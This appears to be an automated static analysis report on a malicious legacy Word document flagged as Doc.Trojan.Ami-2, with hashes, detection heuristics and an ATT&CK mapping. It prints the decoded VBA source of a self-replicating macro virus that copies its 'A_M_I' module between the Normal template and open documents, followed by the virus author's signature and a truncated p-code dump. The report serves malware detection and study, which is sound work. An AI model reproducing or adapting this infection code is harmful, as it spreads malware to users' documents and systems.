Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a48850a973cbcedd…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 35.0 KB
Created: 1999-05-14 12:32:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: e40b8299aa1e2ffe194870863a987822
SHA-1: 2c4d8c627e910e1427aeffa3479118f39762a09d
SHA-256: a48850a973cbcedd555ba92362b9dc76475c71063143cc33e04b7471a4e5ef0b
Risk score: 100

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic

The file is identified as malicious by ClamAV and contains both legacy WordBasic and VBA macros. The 'Add_Modul_Infection' subroutine in the 'A_M_I' module copies that module between the Normal template and the active document, whichever of the two does not yet contain it, after adding a reference to the VBIDE type library so the VBA project object model can be scripted. This is a classic macro-virus self-replication mechanism aimed at persistence and further spread; the intent of any additional injected code is not fully discernible because the extracted script is truncated, but the mechanism is consistent with downloader or persistence-oriented malware.

Heuristics (3)

  • ClamAV: Doc.Trojan.Ami-2 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Ami-2
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected [medium] (OLE_VBA_MACROS)
    The document contains VBA macro code.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11205 bytes
SHA-256: 551ce148d2de8b54d09688333ef4162aeb9978f481366e48c2acc7021fd9b412

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub t()

For I = 1 To ActiveDocument.VBProject.VBComponents.Count
    MsgBox ActiveDocument.VBProject.VBComponents(I).Name
Next
End Sub


Attribute VB_Name = "A_M_I"
Public Normal_ As Object, Active_ As Object

Sub Add_Modul_Infection()
On Error Resume Next

Set Normal_ = NormalTemplate.VBProject
Set Active_ = ActiveDocument.VBProject

Const ModulName_ = "A_M_I"

NormalIns_ = False
ActiveIns_ = False

CheckRefNormal_
CheckRefActive_

NormalComp_ = Normal_.VBComponents.Count
ActiveComp_ = Active_.VBComponents.Count


For x = 1 To NormalComp_
    If Normal_.VBComponents(x).Name = ModulName_ Then _
    NormalIns_ = True
Next

For y = 1 To ActiveComp_
    If Active_.VBComponents(y).Name = ModulName_ Then _
    ActiveIns_ = True
Next


If NormalIns_ = False Then
  
    VirusLength_ = Active_.VBComponents(ModulName_) _
                    .CodeModule.CountOfLines
    VirusCode_ = Active_.VBComponents(ModulName_) _
                    .CodeModule.Lines(1, VirusLength_)
 
    Normal_.VBComponents.Add (vbext_ct_StdModule)
    Normal_.VBComponents((NormalComp_ + 1)).Name = ModulName_
    Normal_.VBComponents(ModulName_).CodeModule.AddFromString VirusCode_
        
End If

If ActiveIns_ = False Then

    VirusLength_ = Normal_.VBComponents(ModulName_) _
                    .CodeModule.CountOfLines
    VirusCode_ = Normal_.VBComponents(ModulName_) _
                    .CodeModule.Lines(1, VirusLength_)
    
    Active_.VBComponents.Add (vbext_ct_StdModule)
    Active_.VBComponents((ActiveComp_ + 1)).Name = ModulName_
    Active_.VBComponents(ModulName_).CodeModule.AddFromString VirusCode_

End If

End Sub

Function CheckRefNormal_()
CheckRefNormal_ = False

For I = 1 To Normal_.References.Count
    If Normal_.References(I).Name = "VBIDE" Then CheckRefNormal_ = True
Next

If CheckRefNormal_ = False Then
    Normal_.References _
     .AddFromGuid "{0002E157-0000-0000-C000-000000000046}", 1, 0
End If

End Function

Function CheckRefActive_()
CheckRefActive_ = False

For I = 1 To Active_.References.Count
    If Active_.References(I).Name = "VBIDE" Then CheckRefActive_ = True
Next

If CheckRefActive_ = False Then
    Active_.References _
     .AddFromGuid "{0002E157-0000-0000-C000-000000000046}", 1, 0
End If

End Function

' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'  Jack Twoflower presents: AddModulInfection
' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

'  This is a new technic to infect moduls
'  without import/export.

'  The code to add the 'VBIDE' library was
'  very hard work, cause I didn't find any
'  information in books, so I tried and
'  tried. How you see, I had success! ;)

' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'  I like to thank to following ppl:
' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   
'  ~~+ LineZerØ Network (sorry, but you will
'                        stand strong with-
'                        out me ;( )

'  ~~+ Clau[UC] for helping me in irc and
'               testing this here. ;)

'  ~~+ VicodinES for being to greatest!
                
' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

'Thnx a lot
'Jack Twoflower


' Processing file: /opt/analyzer/scan_staging/285e56bd213d4e16971bc1d7db6ed547.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1800 bytes
' Line #0:
' 	FuncDefn (Sub t())
' Line #1:
' Line #2:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #3:
' 	Ld I 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	ArgsCall MsgBox 0x0001 
' Line #4:
' 	StartForVariable 
' 	Next 
' Line #5:

... (truncated)